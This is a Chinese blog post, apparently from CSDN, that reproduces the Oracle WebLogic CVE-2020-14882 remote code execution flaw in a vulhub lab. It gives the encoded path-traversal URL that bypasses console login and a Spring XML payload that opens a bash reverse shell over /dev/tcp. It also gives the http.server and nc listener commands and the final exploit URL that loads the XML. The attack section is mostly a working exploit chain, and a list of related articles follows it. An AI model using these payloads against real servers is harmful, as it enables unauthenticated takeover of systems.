Weblogic漏洞复现之远程代码执行(CVE-2020-14882)

最新推荐文章于 2024-08-13 09:10:08 发布
最新推荐文章于 2024-08-13 09:10:08 发布
阅读量1k 收藏 11
点赞数 10
分类专栏: Weblogic漏洞复现 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hhsjjsj/article/details/140971615
版权

目录

前提回顾

Weblogic漏洞复现之弱口令
Weblogic漏洞复现之任意文件上传(CVE-2018-2894)
Weblogic漏洞复现之SSRF(CVE-2014-4210)

Weblogic简介

全称为Oracle WebLogic Server,是基于JavaEE服务器的中间件

基础环境

靶场:weblogic(vulhub)

复现过程

这里有三种利用方式,前面几种在这里就不演示了,这里演示下利用XML,想了解的可以看看下面这篇文章
CVE-2020-14882 Weblogic Console远程代码执行漏洞复现(豪华版)

在配置好环境后,我们这里先测试下看看是否存在未授权漏洞
构造payload看看是否能直接登入后台,不需要验证

http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=JmsSAFAgentSAFAgentTablePage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

在这里插入图片描述
可以看见,直接登入了后台,说明存在漏洞,那么我们就可以好好利用这个漏洞,这里我们用XML的方式,构建redis反弹

XML内容:

//记得修改ip
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>/bin/bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/xxx.xxx.xxx.xxx 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>

这里我们还需要利用一个工具来提供HTTP服务器
添加链接描述
这里面讲解了使用流程,我们只需要按照流程来做即可
先准备另外一台虚拟机,用来监听
该虚拟机需要配备上面的工具和XML代码
请添加图片描述
此时输入

//这里监听的端口可以修改
python -m http.server 8888

在这里插入图片描述
此时将这台虚拟机多开或者通过Xshell工具再开一个窗口,在这个窗口中监听

//这里监听的端口可以修改
nc -lvp 5555

在这里插入图片描述
接下来只需要在浏览器中输入对应的url即可,

http://IP1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://IP2:8888/poc.xml")
//IP1 改成你的靶机的ip
//IP2 改成你的监听机的ip
//8888 改成你的监听机监听端口

接下来等待监听机5555端口的反应,看到返回bash即可,这里复现成功有一定偶然性,可以多次尝试
请添加图片描述

睿智阿伟
关注
  • 10
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2020-14882 Weblogic Console远程代码执行漏洞复现
谢公子的博客
02-06 2053
目录 漏洞背景 漏洞影响版本 漏洞复现 环境搭建 未授权访问 执行payload后回显 漏洞修复 漏洞背景 2020年10月30日,Oracle 官方的发布最新漏洞,该漏洞编号为 CVE-2020-14882漏洞等级:严重 ,漏洞评分:9.8 。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码漏洞影响版本 Oracle WeblogicServ
CVE-2020-14882 WebLogic远程代码执行漏洞复现
热门推荐
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 We
Oracle WebLogic Server 安全漏洞(CVE-2020-14882)复现
2301_77132421的博客
07-05 839
攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 7082
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
CVE-2020-14882【vulhub weblogic漏洞复现
weixin_65722679的博客
07-04 267
CVE-2020-14882【vulhub weblogic漏洞复现
【Vulhub漏洞复现Weblogic(CVE-2020-14882)漏洞复现
一剑开天门!的博客
02-22 1742
【Vulhub漏洞复现Weblogic(CVE-2020-14882)漏洞复现
Weblogic远程代码执行漏洞(CVE-2020-14645)复现
玄道的网安博客
07-25 4598
前言 WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Oracle WebLogic Server存在远程代码执行漏洞。攻击者可利用漏洞实现远程代码执行。 环境搭建 下载地址: https://www.oracle.com/middleware/technologies/weblogic-server-insta.
CVE-2021-2109 )Weblogic Server远程代码执行漏洞复现
m0_48520508的博客
02-02 1808
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 0x01漏洞概述 该漏洞Weblogic远程代码执行漏洞漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。 0x02影响版本 We
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)漏洞复现
weixin_48413667的博客
09-22 8089
一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883
复现nuclei——CVE-2020-14882WebLogic远程代码执行漏洞
记录并分享学习安全的知识点..
01-21 2057
一、漏洞介绍 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。 二、影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLo
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
2401_83739434的博客
04-03 2540
环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。
CVE-2020-14882&14883漏洞复现
m0_52089634的博客
01-03 1574
CVE漏洞复现
CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
AzVoidSUN的博客
11-04 1362
环境安装 首先电脑已安装好的jdk \bin目录下 然后java -jar 执行你的jar包就可以了 Oracle WebLogic Server版本:10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。均存在此漏洞。 构造poc ,未授权访问后台地址http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsCo
漏洞复现Weblogic未授权命令执行漏洞CVE-2020-14882
weixin_43486390的博客
12-17 2175
CVE-2020-14882
weblogic未授权访问漏洞复现CVE-2020-14882
Armandhe的博客
06-07 5303
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
weblogic漏洞——CVE-2020-14882
最新发布
weixin_57379923的博客
08-13 1213
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
vulhub中Weblogic 管理控制台未授权远程命令执行漏洞复现CVE-2020-14882CVE-2020-14883)
yougexiaojiuguan的博客
03-10 720
漏洞复现过程的记录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

睿智阿伟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值